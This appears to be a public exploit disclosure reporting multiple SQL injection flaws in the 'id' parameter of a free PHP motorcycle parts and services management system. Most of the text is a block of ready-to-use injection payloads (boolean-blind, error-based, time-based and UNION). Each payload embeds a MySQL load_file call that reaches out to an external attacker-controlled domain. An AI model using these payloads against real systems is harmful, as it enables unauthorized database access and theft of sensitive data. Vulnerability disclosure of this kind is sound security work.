## Titles: Motorcycle Parts and Services Management System - MPSSMS- PHP (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 12/04/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15142/motorcycle-parts-and-services-management-system-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks. The
payload '+(select load_file('\\\\
l6sb5xs4svis8hmnhre4yftvhmnfbcz32rtek29.namaikatiputkataoligofren.com\\bcu'))+'
was submitted in the id parameter. This payload injects a SQL sub-query
that calls MySQL's load_file function with a UNC file path that references
a URL on an external domain. The application interacted with that domain,
indicating that the injected SQL query was executed. The attacker can get
all sensitive information from this system when he attacks it online!

STATUS: HIGH- Vulnerability


[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: p=products/view_product&id=5'+(select load_file('\\\\
l6sb5xs4svis8hmnhre4yftvhmnfbcz32rtek29.namaikatiputkataoligofren.com\\bcu'))+''
OR NOT 8915=8915 AND 'BQWs'='BQWs

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload: p=products/view_product&id=5'+(select load_file('\\\\
l6sb5xs4svis8hmnhre4yftvhmnfbcz32rtek29.namaikatiputkataoligofren.com\\bcu'))+''
OR (SELECT 8925 FROM(SELECT COUNT(*),CONCAT(0x7162706a71,(SELECT
(ELT(8925=8925,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oENT'='oENT

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=products/view_product&id=5'+(select load_file('\\\\
l6sb5xs4svis8hmnhre4yftvhmnfbcz32rtek29.namaikatiputkataoligofren.com\\bcu'))+''
AND (SELECT 4601 FROM (SELECT(SLEEP(7)))axAk) AND 'RBqp'='RBqp

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: p=products/view_product&id=5'+(select load_file('\\\\
l6sb5xs4svis8hmnhre4yftvhmnfbcz32rtek29.namaikatiputkataoligofren.com\\bcu'))+''
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162706a71,0x694e62646745617175564a4e53674f6d6a79634b777a4c6c4e7076645948667754796b6370576a67,0x716a706271),NULL#
---
```

## Reproduce:
[href](https://www.patreon.com/posts/mpssms-php-by-v1-117287350)

## Demo PoC:
[href](https://www.patreon.com/posts/mpssms-php-by-v1-117287350)

## Time spent:
01:27:00